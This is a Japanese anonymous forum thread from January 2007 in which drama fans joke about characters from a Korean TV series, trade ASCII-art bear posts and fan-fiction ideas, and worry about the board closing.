「ヨンス、僕が帰ってきてる夜は下着付けなくていいから」
「え・・・?」
「毎日のことだからね、わかったね」
「・・・・・・」

316 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:17:48
小さなレースついた2枚1000円位のパンティに
刺激が強過ぎて目まいを覚える室長

317 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:26:31
えええー!!!???
ヨンスクマーにそんなことワケワカメ!
ええー結婚したらみんなパンツ脱いで夫の帰りを待つの???
ナレに確認しなきゃ、プレゼントのあれ、あれしか着ちゃいけなかったのーーー!
何で教えてくれなかったのよう!初夜でまちがってしまったわよーーー!グスンorz

318 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:52:20
初夜で脱いでたら室長間違いなく鼻血ものw

319 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:56:41
カリアゲの夢

妻がバイクに乗る時のジャンバーのポケットに積めこみすぎで裂けてしまったとこ繕ってくれる
ちょっと照れるけど
切れたパンツのゴムを母さんみたいに新しいのに取り替えてくれる
僕だけのパンツとわかるように内側にカリアゲと刺繍してくれる
僕は幸せ、これだけで愛されていると感じることができる
次のコンペのサウナが楽しみー!

320 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 02:59:34
カリアゲキモゴリラは白いブリーフだなきっとw

321 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 03:01:50
ゆるい→パンツ?→ヨンスさんのパンツ→カリアゲゴリラの夢まで広がる
愉快なクマーとクマヲタ最高!

322 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 03:12:15
久々のパーティーだね!
クマーが華麗に登場したら完璧なのにねーw

323 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 03:14:26
308はニセクマー?

324 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 03:53:03
私コクマーと申します
いっかいの釣り氏であったところ縁ありましてニセと契りをかわしたところ
クマーの目に止まるところとなりまして、クマー親分に拾われまして
釣りクマーの名をへんじょう、コクマーを名乗るところとあいなりました。
(ゆるおつむのコクマーはやっぱり上手にみえを切ることができませんでした。)
コクマー誕生はかなりみっともなかったなり、その後も華麗な存在となることもなく
どう説明すればいいなりか?・・・参った今更身元を示すのも難しいなりorz
クマーの太鼓餅?・・・オールクマーズのひとりってことではだめくま?

325 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 04:47:45
>>323
違うよん
クマーじゃね?w

326 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 05:16:42
>>299がクマーじゃない?

327 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 08:24:17
ラムクマー〜ゆるカワ の話がヨンスおパンツ祭w

328 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 15:14:36
おパンツ祭、楽しそーだったね


329 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 17:46:24
>>326は違いのわかるクマー分別の達人
すげーw

330 :壁に耳あり、障子にメアリーさん:2007/01/07(日) 23:39:29
クマーの分別も種類多くて大変だw

331 :壁に耳あり、障子にメアリーさん:2007/01/08(月) 00:55:23
祭りでベロンベロンだったコクマーorz・・・

332 :壁に耳あり、障子にメアリーさん:2007/01/08(月) 01:04:59
【クマーの分別は】【種類別・正確に】

333 :壁に耳あり、障子にメアリーさん:2007/01/08(月) 21:15:26
ほしゅ

334 :壁に耳あり、障子にメアリーさん:2007/01/08(月) 21:50:59
ほしゅ

335 :壁に耳あり、障子にメアリーさん:2007/01/08(月) 22:26:45
>>333
>>334
     〇,,〇 ∩
    (,,・(エ)・)/   そこはボケるところクマーw
 _ / /   /
\⊂ノ ̄ ̄ ̄ ̄\
 ||\        \
 ||\|| ̄ ̄ ̄ ̄ ̄||
    .|| ̄ ̄ ̄ ̄ ̄||


336 :壁に耳あり、障子にメアリーさん:2007/01/08(月) 23:06:24
             でもボケはとっても難しいクマー

     〇,,〇   ∬
    (,,・(エ)・)  旦 (::゚::)
   / / ̄ ̄ ̄ ̄ ̄ ̄\
.  o( / # # # # # # ## #\
  ゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙

っ旦 (::゚::) 旦 (::゚::)
 寝る前にマターリしてクマーw

337 :壁に耳あり、障子にメアリーさん:2007/01/09(火) 00:46:17

     〇,,〇     ・・・クマー
    (,,-(エ)-)  旦    ・・・・ムニャムニャ・・・お年玉が・・・
   / / ̄ ̄ ̄ ̄ ̄ ̄\
.  o( / # # # # # # ## #\ (::゚::)
  ゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙


338 :壁に耳あり、障子にメアリーさん:2007/01/09(火) 01:21:28
     〇,,〇       ・・・クマーが虹の旅に出た夢を見た・・・
    (,,・(エ)・)  旦
   / / ̄ ̄ ̄ ̄ ̄ ̄\
.  o( / # # # # # # ## #\ (::゚::)
  ゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙゙


339 :壁に耳あり、障子にメアリーさん:2007/01/09(火) 19:33:17
クマー生きてる?
ノロに感染したのか?

340 :壁に耳あり、障子にメアリーさん:2007/01/09(火) 23:35:03
クマーはきっと疲れてる
だからいつもここにいて、おもしろを探してる気がする
おパンツ祭りみたいにヲタでクマーをわらかしてあげたいクマー

341 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 00:07:31
ウニクロファッションのヨンスクマーが
小銭が溜まり、若い美大生と過ごし、社長婦人の面子とかの新しい波に触れた時
彼女自信は何をチョイスすると思う?
他所の虹にあるようにあなた好みのヨンスクマーはいまいち納得できないのだ!
ボーダーのポロを自信マンマンでペアルックにする彼女だぞ
安くて可愛いという理由でゴスロリをどこかで見つけて、一着密かに隠してまいかw


342 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 01:09:32
ヨンス服の変遷

ウニクロ
 ↓
GAP
 ↓
無印 ←今 この辺

343 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 01:21:43
ム印かorz
見方によってはピンク&ブルーのがアバンギャルド&ショッキングw
その後が微妙なりね
クマーは宵っ張りを克服して早ね早起きクマーに戻って毛並みを美しく保ってよw
もやクマー

344 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 08:38:36
ウニクロ

GAP

無印

ジャスコ ←最近CMを見て気になってる

345 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 09:51:55
ぬけてるw
シマムラ

ウニクロ

GAP

無印

346 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 11:56:14
>>345
華奢なヨンスさんなら、これもありかもw

西松屋(小学生高学年サイズ)
 ↓
シマムラ
 ↓
ウニクロ
 ↓
GAP
 ↓
無印

347 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 13:21:02
自分で縫いそうw

348 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 17:52:14
なんかミシン踏むの似合ってるw>ヨンスさん

349 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 19:38:44
内職のイメージw

350 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 19:57:02
誰一人デザイナーの名前をあげてないw

351 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 20:17:48
美大生なんだぞ
むしろデザイナーのはずw

352 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 20:26:25
サンリオ

353 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 22:31:43
誰もヨンスさんがセンスを磨くことを考えられないのね
ヨンスさん、恋は初めてだから一度は室長のネクタイをプレゼントしたがるよね
なんかコワイな
さて、箱をあけたときのミンチョルクマーのリアクションは?

354 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 22:45:56
スラムな苦学生ヨンスだけど
美大生のセンスでチョイスすれば
しまむらだって素敵なパリジェンヌファッソン!

・・・だが、バカップルデートのペアルックを見る限り
ヨンスさんに服飾のセンスは無いorz

355 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 22:49:34
>>354
すんなり読んでしまうが、ものすごい矛盾!w

356 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 23:02:12
ヨンスさんの筋金入りのウニクロセンスは柄物がないところじゃない?
単色、同系色。唯一華やかなイカ宿でのポイントは真赤なカーディガンが印象的
衣装さんがorzのおかげで、クマーズ内では愛すべきヨンスさんのできあがり〜

357 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 23:22:57
バカップルペアルックはネ申w

358 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 23:34:56
>>350
つ アンドレ

359 :壁に耳あり、障子にメアリーさん:2007/01/10(水) 23:44:17
洩れはヨンスさん中の人ヲタでないけれど
中の人にこんな愛され方を知ってもらいたい気がしてきたw
情熱ヲタとは別にこんなおばかなユルヲタもいるよーってw
まっご本人が叩きと感じる危機感はあるが・・・

360 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 00:04:21
>>350
盲点だった!クマスレ初登場?w


361 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 00:21:22
アンドレショーのラスト、ウェディング服着て欲しい>ミンチョル・ヨンス結婚式
全身白い宇宙服&白いゴム長履いた室長を見てみたいw

362 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 00:22:28
ミンチョルクマーとヨンスクマーが、仲睦ましくアンドレショーにご出席
これぞブロガーには描けないリアリティーかもw
でもクマーって以外とヲタが描いたラインには乗ってこないんだよなーwざんねん!w

363 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 00:31:24
>>350
灯台下暗し

364 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 06:16:51
>>359
いや、中の人はビストロで雪だるまの頭をもいだ人物だ
ユルヲタ歓迎じゃね?

365 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 08:50:28
韓国国民デザイナーと音楽業界大手敏腕室長
きっとパーティーで会うよな。うん。
ホワイトファンタジーとビクトリーのコラボとか
やってくれたらスゲー実況盛り上がったのに。

366 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 08:55:14
>>364
実は過激派なヨンスだからw

367 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 09:25:37
>>353
ミンジのピンクトランクスに感激してたジャマイカw

368 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 11:09:27
仕事スーツは素敵でも、
私服のセンスはケンチャナなのか室長orz

369 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 15:34:05
>>362>>365
まさにそんなかんじの虹を過去に書いたことがあるw

370 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 16:36:07
>>369
kwsk!

371 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 16:56:45
>>369
うpよろ〜!

372 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 17:18:35
>>370>>371
マジで>>362>>365をくっつけた虹なんだよ
2年くらい前だから保存もしてないorz

ミンチョルんとこの歌手が新曲でアンドレ衣装を着る

ついでにアンドレショーも開催

打ち合わせで偶然ミンチョルとヨンス夫妻のケコーン式写真を見たアンドレ

夫妻の馴れ初めを聞き感動したアンドレ

ショーのラストで夫妻がマリエで出演、テーマは永遠の愛

こんな流れw

373 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 17:57:41
>>372
いや〜ん それええジャマイカ!
その気になったら思い出して書いてよぉ
その話、実写でも見たいよね
特にラスト、ショーのフィナーレを飾る二人の姿w

374 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 18:05:19
>>372
アンドレ先生の出番が多そうな良虹w
カリアゲゴリラのポジションは?

375 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 18:18:51
妄想の中で・・・
ヨンスさんと二人、純白アンドレ服を着て
そっと彼女の手を取る僕・・・
カリアゲゴリラ、キモーーいwww

376 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 18:31:45
orz
あのポッチャリお手々を思い出した

377 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 18:36:52
最も重要なラストを思い出したw
ショーのあと2度目の新婚旅行に行くシーンにプチエロ有り
>>373
うpしたサイトも自ブロも閉鎖したからもう無理orz
>>344
カリアゲゴリラは・・・・・・・・・・・・・・・・・・忘れたw
セナのおまけ程度に脇役出演かな?
>>375
そっちのほうに興味有りwwwwwwwwwwwww

378 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 19:56:31
壁板の梅スレってどこ?
見失った〜

379 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 20:42:16
漏れも見失ってる気がする・・・
--- も人いないし、どこが賑やかな梅なんだろ?

380 :壁に耳あり、障子にメアリーさん:2007/01/11(木) 21:33:26
>>377
プチエロだけでもカモーン!

381 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 00:19:53
>>367
洩れの衝撃シーン
明るい店内で女二人に囲まれパンツ広げてニマニマ男

382 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 01:23:21
そういや小さい頃の室長&ミンジのパンツは
ミョンジャ母さんが当然買ってたんだろーね
下着を揃えてくれてた人をあそこまで憎めるものか
しばし熟考・・・

383 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 01:31:48
クマーが描いた法事の夜で
わだかまりを解いてくれた ウルウル

384 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 03:31:35

今流行っている梅スレへ連れて行って・・・

        
        ○,,○   ┣¨┣¨┣¨┣¨┣¨┣¨・・・・・・・
     ハ,,,ハ((エ)・,,)⌒ヽ
    /〃 `'''''''''(ノ''''''ヽ_)'''ヽ      
  /  ‘           l〜   |         
  (OO)∧            |     
   `'ー、           丿             (´⌒;;(´⌒;;
      /丿\ヽ ̄/ ノ\ (_.       (´⌒;;(´⌒;;(´⌒;;
      Ll    ̄ Ll   `ー‐┘   (´⌒;;(´⌒;;


385 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 03:38:10
>>384
誘導禁止なんだよorz
わかってくれ

386 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 03:54:59
>>385
わかってるクマーいのたんに言ったクマー
コクマーも以前は梅っ子、自力で行くクマー
心配かけてスマソクマー

387 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 04:12:36
>>386
謝らないで栗よ〜
たくさんあって漏れも12個しか把握してないんだよ
それっぽいスレあったらなんか書いてみれ
もやー

388 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 04:57:48
>>387
12個しかって、スゴス。wどんどん広がってるんだヌ
巡回しんどくなってきてるし、洩れここの用務員さんしよっかなーw
でも、クマーが名無しの時にコクマーとクマー&ニセタンと区別できないクマヲタも
増えてきたみたいだし(ヲタ大歓迎!)、コクマー隠れた方がいいのかな?・・・できそうにないorz
洩れコクマーと呼ばれるたび、快感を・・・orz 単に食いしん坊の虹食いのくせしてorz
・・・朝になってしまうので洩れも毛繕いしようっと!
387タン気を使わせたみたいでほんとゴメンよ、もや〜
明日の事は明日考えるとする!









389 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 10:03:50
全部壁にあるの?
12も把握してないよw

390 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 11:40:49
クマーの突撃インタブー

今とある大型掲示板の片隅で話題になっているヨンスさんの下着について
非常に詳しく研究しておられる方に聞いてみたいと思います!

   ∩___∩
   | ノ      ヽ
  /  ●   ● |  
  |    ( _●_)  ミ   
 彡、   |∪|  、`\  
/ _(♯) ヽノ /´>  )
(___)   / (_/
 |   U   /
 |  /\ \
 | /    )  )
 ∪    (  \
       \_)

どうも初めまして。よろしくお願いします。あなたはヨンスさんの下着についてかなり
詳しく研究しておられるとか?


391 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 11:41:28

(音声は変えてあります。プライバシーを守りたいとのことですのでくれぐれも詮索は
しないでください)
『いえ、研究というか・・・かつて一緒に暮らしたことがあるだけです。見ようと思わ
なくても自然に目にはいりますから・・・』

では本題にはいりますが、ずばり彼女の下着はグンゼですか?色や形等わかる範囲でいい
ので教えてください

『ふっふっふw皆さんもグンゼだと予想していたのですね。僕も・・いえ私もてっきり
そうだと思っていたのですが、実際は違います。では白いレース系だと?彼女のイメージ
では白い控えめなレースの小さい下着だと思うでしょ?でもこれも違うんだな〜w』

え?白レースも違う?ではセクシー系なのですか・・・?

『いや、セクシー系よりもそそりますよ!!』

もったいぶらずにさっさと言え!!

『今はわかりませんよ。結婚してからは兄さ・・夫の趣味もありますから。でも当時は
かなりカラフルでした。オレンジや水色、ピンクもありましたし・・黄緑なんてのもw
面積はちいさいのですが、セクシーというよりもファンシーというか・・・。時々ウサギや
クマがかいてあったりして、幼い少女のような・・・。ね、そそるでしょ〜』

以上、クマーの突撃インタブーでしたorz


392 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 13:02:30
wwwwwクマー突撃インタブーw ナイス!ww

クマー追加の質問して栗
Q.そのファンシー下着はどんな素材でしたか?
Q.おパンツはお詳しいようですがブラはどうなんですか?
Q.専門家として研究対象(おパンツ・ブラ)のサンプルをいくつか持っているのですか?

393 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 16:50:08
>>379
正解

394 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 18:20:48
ここのクマーとクマヲタ達はどこへ避難したらいいの?
3ちゃん?
。・゚・(ノД`)・゚・。みんなと別れたくないよおおおおおおぉぉぉぉぉぉ

395 :壁に耳あり、障子にメアリーさん:2007/01/12(金) 18:56:23
;´д⊂ヽ途方にくれてまつ

396 :壁に耳あり、障子にメアリーさん:2007/01/13(土) 00:26:14
>>390
まずはトン!です

洩れほんとの孤児になってしまうなりか?
・・・

397 :壁に耳あり、障子にメアリーさん:2007/01/13(土) 00:46:17
前も閉鎖騒ぎあったけど、それは鯖の重さが原因だった
今回はどうなんだろうね
何となく閉鎖にはならないと思うんだけど

398 :壁に耳あり、障子にメアリーさん:2007/01/13(土) 04:40:43
>>397
最初はそんな風に思っていたんだけれど、結局オロオロ不安に陥ってしまった・・・

クマー
せっかくうpしてくれたのにタイミングorz
木綿ね。少し餅付いたよw
一緒に暮らしたことがあるなんてwものは言い様、あわれカリアゲw
カリアゲもインタブ受けたのをネラーに報告しょうとして、この状況にオロオロかもw

カリアゲは”もまいら”、漏れは”くまいら”どっちも似たようなものなのかorzorz




399 :壁に耳あり、障子にメアリーさん:2007/01/13(土) 21:11:32
ほんとタイミング悪だたw

400 :壁に耳あり、障子にメアリーさん:2007/01/13(土) 23:18:04
カリアゲゴリラの研究結果からすると
ヨンスさんのおパンツは3枚いくらの激安だなw

401 :壁に耳あり、障子にメアリーさん:2007/01/13(土) 23:45:29
路上でオバちゃんが売ってる激安系w

402 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 00:20:28
お姉ちゃん常連さんだから1枚おまけしとくよ!とかw

403 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 00:24:24
>>402
おまけパンツは1サイズデカいのをもらい
ナレへのお土産にする友情厚いヨンスw

404 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 00:29:53
きもきも〜w
何でたかだたおパンツで今回こんなにきもいのか
! カリアゲが得意げだからだ! きもきも〜オウェッ=3
スツレイスマスタww

405 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 00:56:26
自然に目に入った激安パンツにそそられるなんて
しかも、年上の女性なのにロリコン趣味をかぶせるカリアゲorz
突撃インタブーしたクマーに同情する
室長なら絶対洗濯物なんて目にとめないはず・・・と、思いたいw
イカ宿でもし目に触れるような事があったとしても、即座に灯りを消して
ヨンスさんに恥ずかしい思いをさせたりしないよー
こんなに切り詰める生活から僕が開放してあげるって、もう頑張りすぎないでって
センチになっても下履きに欲情するなんてことはない!・・・と信じたいww


406 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 01:09:43
>>405
甘いな
室長の眼は赤外線カメラ機能を持っているから
暗闇のおパンツも表情一つ変えずにさり気なく凝視出来るんだぞ

407 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 01:34:29
ファンシー下着は、洩れ的にはチビモンキーのイメージ
ヨンスさんはベージュの大きめパンツでいいやw
何を着ても透けないし、漂白しなくていいからw

408 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 01:55:47
クマーもヲタもすっかり忘れてしまったけど
クマー、前に熱心にエレベーターシーンを見てたじゃない?
あの日の室長の揺れる心を教えてほしい!
あと、初デート後にナレ&ヨンスの部屋に上がりこんで
帰りたくなくなっちゃった室長が、ナレを見て慌てて逃げ帰ったあとは
ゆっくりバスに乗ってあのデレデレの余韻に浸って帰ったのか?それとも
タクシーに乗ると供に即座にクールに戻ってしまったのか?

409 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 02:30:27



      。※※。 +
   + /゚(0ノハ0)
    //(・(ェ)・)    幸福に震えていますクマー
   /〈ソ〉`")〉
  / /ヽ<(@)フノ\
`/ (X}∠(@(@)>{X)
<_  / / |く/|_>l ||
 `ー/ / | | | |_-"
  `^ー---、__」-"


410 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 03:17:45
ヨンスクマー!
室長と結婚できるなんて羨ましいけど
走っちゃだめだぞw

411 :壁に耳あり、障子にメアリーさん:2007/01/14(日) 03:27:41
はい、気をつけますクマー
ご心配感謝いたしますクマー
ミンチョルクマーをきっと幸せにしますクマー

412 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 00:56:29
>>399
>>410
クマー?

413 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 00:56:46
いよいよ避難を考えなければならないようだぬ
漏れ携帯でスレ立てれないorz
どなたか3ちゃんに立てれる人はいませんかーーー!

414 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 00:59:59
3経験ないけど、スレ立てって同じ?
できるならコクマー用務員がやってもいいけど・・・

415 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 01:10:40
虹スレとか感想スレはどうする?

416 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 01:22:30
>>415
それはそこの住人で。
まずはクマー&ヲタがどのスレタイで3のどこに避難するかだべ

417 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 01:23:14
住人ほとんどかぶってるべw

418 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 01:30:58
言いきれないし、そのスレで対応した方がベストだし
本当にかぶっているなら、クマスレ解決後に順次というのでは
避難するつもりなら、スレたてよりまずクマスレの行く先とキーワードは
ここに残しておかないと
24時間稼動ではないが、コクマーで良ければ立てるのできると思う

419 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 01:41:13
”クマー”を使うのそれとも”カリアゲ”?
誰がどこに立てるの?

420 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 01:57:51
ピンクとシャワートイレ板も残るみたいだ

421 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 02:01:00
木綿コクマーはタイムリミット
今夜はこれ以上ムリポ脱落ゴメンorz

422 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 02:07:17
3ちゃん ほのぼの は?

423 :壁に耳あり、障子にメアリーさん:2007/01/15(月) 18:44:25
クマー&クマヲタのみんな
またここで遊べるねー

424 :壁に耳あり、障子にメアリーさん:2007/01/16(火) 08:52:21
ノシ

425 :壁に耳あり、障子にメアリーさん:2007/01/16(火) 22:15:36

♪  〇__〇         ラにも行かないユルヲタだけど〜
   (,,・(ェ)・) ))        ちょっとココロがウキウキクマー〜
 (( ( つ ヽ、   ♪
   〉 とノ ) ))
  (__ノ^(_)


426 :壁に耳あり、障子にメアリーさん:2007/01/16(火) 23:46:08
チャック全開かよ!?て焦ったよねw

427 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 10:39:41
あきらかに全開じゃないよねぇw

428 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 13:18:32
誰かーー!
誰かいませんかーーー!!




寂しいので 点呼
つヲタ1

429 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 13:20:00
ノシ

つクマー1

430 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 14:01:01
>>427
初見は疑ったよw

431 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 14:17:19
クマーいたのけ!?w

つヲタ2

432 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 14:44:56
見つけ〜

433 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 15:39:10
全開じゃなかったのか、ほっw

つヲタ3

434 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 15:39:15
規制中携帯ヲタ3

435 :434:2007/01/17(水) 16:53:09
規制解除だ〜!
ヲタ3 ×
ヲタ4 ○


436 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 20:14:16
ヲタ5のし!

437 :ヲタ1:2007/01/17(水) 20:42:00
あり?あと住人いないの?
このスレ意外と少数精鋭住人で回ってたのけ!?

438 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 20:50:08
中の人来てるから忙しいのかな?
地方な漏れには関係ないがw@ヒグマー

439 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 21:58:39
住人点呼中間集計

ここのクマー 1匹
ヒグマー   1匹

クマーヲタ  5匹

440 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 22:09:55
クマーヲタ 5匹 のなかにヒグマーその2がいてますw


441 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 22:29:34
クマーヲタ5匹の中のワグマーその1
住人少数精鋭説、実は以前から感じてたw
でもこんなに少数ではないはず
冬眠中か?w

442 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 22:55:08
>>440
ムフッ実はもう1匹ヒグマー隠れてたりしてw

住人点呼中間集計(改)

ここのクマー  1匹
ヒグマー(ヲタ兼) 3匹
クマーヲタ   2匹

道産子ヲタ多いなw

443 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 23:01:07
>>441
おっと失礼 改めて

住人点呼中間集計(改々)

ここのクマー  1匹
ヒグマー(ヲタ兼) 3匹
ワグマー(ヲタ兼) 1匹
ピュアクマーヲタ 1匹

444 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 23:21:09
コクマーとバーカバーカタソはまだ現れていないのかな?

445 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 23:33:35
ヲタ5はコクマーだよ
ニセは?
バーカバーカタソは@バーカバーカといったことはないw

446 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 23:38:34
レシピタンはいるかのう?

447 :壁に耳あり、障子にメアリーさん:2007/01/17(水) 23:39:30
もめんなさい、緑になっちゃった。

448 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 00:10:48
>>445
コクマーはヒグマーじゃないよね
んじゃ
住人点呼中間集計(改々々)

ここのクマー  1匹
ヒグマー(ヲタ兼) 3匹
ワグマー(ヲタ兼) 1匹
コクマー      1匹

あとの住人は?

449 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 00:42:05
ニセはまだ巡回してるのかな

450 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 00:45:25
まちゃまちゃってなんか懐きたくなる声だぬ
クマーとキャラかぶってたりしてw

451 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 00:48:52
既に中間集計の中にカウントされてるw@ニセ

452 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 00:51:13
>>450
クマー緑のモヒカンだったりしてww
まちゃまちゃは本気出せばカワエエよな

453 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 01:22:59
くまちゃまーーー!

454 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 01:31:38
>>451
ってことはニセはヒグマーだなw

455 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 01:44:57
>>454
パペット・クマペット!

456 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 01:52:00
クマーは今現在黒髪w

457 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 01:54:02
なんか、洩れ夏、だめかもorz
楽しみにして情報いれないようにしてきたけれど
鬱になりそうでこわい・・・

458 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 01:58:22
地毛じゃないなw
って余計なツッコミしたくなるじゃないのww

459 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 02:10:38
オレも夏だめぽ
予告MVみると古い中国映画みたいなストーリーみたいだ

460 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 02:18:52
甘人だって鼻噛んだのに
甘人は拝んでニマニマできたから、また見たいって思えたけれど
夏って引きずりそうな映画でないのかい?

461 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 02:25:47
結局笑えるのは、美日々とハピトゥゲ
クマー、ハピトゥゲの虹ってだめえ〜〜?
と、とりあえず甘えてみるw

462 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 02:35:49
寸にカリアゲキャラをあてはめるのか?
ハヌルでは筆がすすまないw

463 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 02:42:26
テブンとパッカとときどき子供で
つか、テブンの一人芝居でいいよw
それか続編てことで新しくええおんな作ってくりw

464 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 02:58:50
バッカが姉ちゃんと結婚して兄になるw
893と稲中が弟で楽しい兄弟だ

465 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 03:15:38
あのマンガ喫茶は結婚した寸が出ていった部屋に親子が入って
2Fが長女と末っ子とときどき夫婦喧嘩で家出する次女が
そんなこんなで893と稲中が狭い親子の部屋に頻繁に転がり込むw
パッカが結婚したら、当然転がり込むw
何と言う人口密度、楽しそう!

466 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 04:09:18
クマーが黒髪なんていやんいやん
真っ白ふかふか、もふもふしててよw

467 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 04:56:09
亀ですが>>435のヲタ4は>>438のヒグマーです
ってかこの話もう終了してたなw

468 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 04:57:11
うおー!ageになってしもうたorz
もや〜

469 :壁に耳あり、障子にメアリーさん:2007/01/18(木) 07:23:23
おはー
クマーは起きれた?
洩れは起きたぞw希蹟w
いってきまーす!

